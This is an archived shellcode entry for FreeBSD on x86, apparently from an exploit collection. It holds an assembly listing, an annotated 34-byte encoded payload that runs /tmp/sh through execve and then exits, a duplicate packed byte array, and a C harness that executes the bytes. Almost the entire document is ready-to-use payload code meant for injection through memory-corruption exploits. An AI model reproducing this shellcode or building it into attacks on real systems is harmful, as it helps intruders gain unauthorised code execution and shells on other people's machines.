
# Title : freebsd/x86 execve /tmp/sh 34 bytes
# Published : 2004-09-26
# Author : Claes Nyberg
# Previous Title : freebsd/x86 kldload /tmp/o.o 74 bytes
# Next Title : freebsd/x86 chown 0:0 , chmod 6755 & execve /tmp/sh 44 bytes


/*
 * FreeBSD shellcode - execve /tmp/sh
 * 
 * Claes M. Nyberg 20020120
 *
 * <cmn@darklab.org>, <md0claes@mdstud.chalmers.se>
 */

/**********************************************************
void
main()
{
__asm__("
        xorl    %eax, %eax   # eax = 0
        pushl   %eax         # string ends with NULL
        pushl   $0x68732f2f  # push 'hs//' (//sh)
        pushl   $0x706d742f  # push 'pmt/' (/tmp)
        movl    %esp, %ebx   # ebx = argv[0] = string addr
        pushl   %eax         # argv[1] = NULL
        pushl   %ebx         # argv[0] = /tmp//sh
        movl    %esp, %edx   # edx = &argv[0]
        
        pushl   %eax         # envp = NULL
        pushl   %edx         # &argv[0]
        pushl   %ebx         # *path = argv[0]
        pushl   %eax         # Dummy return-address slot (FreeBSD int $0x80 convention)
        movb    $0x3b, %al   # al = 59 = execve
        int     $0x80        # execve(argv[0], argv, NULL)

        xorl    %eax, %eax   # eax = 0
        inc     %eax         # eax++
        pushl   %eax         # Exit value = 1
        pushl   %eax         # Dummy return-address slot (FreeBSD int $0x80 convention)
        int     $0x80        # exit(1); (eax is 1 = exit)
    ");
}
************************************************************/

#include <stdio.h>
#include <string.h>

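/*
 * execve("/tmp//sh") shellcode, 34 bytes, one instruction per line so each
 * group can be matched against the assembly listing above.  The encoded
 * string contains no 0x00 byte, which is why strlen() in main() reports its
 * full length.  The array lives in writable data; whether that region is
 * also executable depends on the platform's memory protection, so the call
 * in main() may fault on systems that enforce non-executable data.
 */
static char freebsd_code[] =
    "\x31\xc0"                  /* xorl    %eax, %eax  */
    "\x50"                      /* pushl   %eax        */
    "\x68\x2f\x2f\x73\x68"      /* pushl   $0x68732f2f */
    "\x68\x2f\x74\x6d\x70"      /* pushl   $0x706d742f */
    "\x89\xe3"                  /* movl    %esp, %ebx  */
    "\x50"                      /* pushl   %eax        */
    "\x53"                      /* pushl   %ebx        */
    "\x89\xe2"                  /* movl    %esp, %edx  */
    "\x50"                      /* pushl   %eax        */
    "\x52"                      /* pushl   %edx        */
    "\x53"                      /* pushl   %ebx        */
    "\x50"                      /* pushl   %eax        */
    "\xb0\x3b"                  /* movb    $0x3b, %al  */
    "\xcd\x80"                  /* int     $0x80       */
    "\x31\xc0"                  /* xorl    %eax, %eax  */
    "\x40"                      /* inc     %eax        */
    "\x50"                      /* pushl   %eax        */
    "\x50"                      /* pushl   %eax        */
    "\xcd\x80";                 /* int     $0x80       */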


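/*
 * The same 34 bytes as freebsd_code, packed eight per line; not referenced
 * by main().  The leading underscore makes this a reserved identifier at
 * file scope (C11 7.1.3), so a rename would be preferable; the name is kept
 * here so any existing reference still resolves.
 */
static char _freebsd_code[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    "\x68\x2f\x74\x6d\x70\x89\xe3\x50"
    "\x53\x89\xe2\x50\x52\x53\x50\xb0"
    "\x3b\xcd\x80\x31\xc0\x40\x50\x50"
    "\xcd\x80";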

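/*
 * Test harness: print the encoded length, then jump into the byte array.
 * Returns 0 only if control comes back, which the shellcode's own
 * execve/exit sequence normally prevents.
 */
int
main(void)
{
	/* Converting an object pointer to a function pointer is a common
	 * extension rather than ISO C, and the target bytes sit in writable
	 * data, which many platforms do not map executable. */
	void (*code)(void) = (void (*)(void))(void *)freebsd_code;

	/* strlen() yields size_t; widen explicitly to match the format. */
	printf("strlen code: %lu\n", (unsigned long)strlen(freebsd_code));
	code();
	return 0;
}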
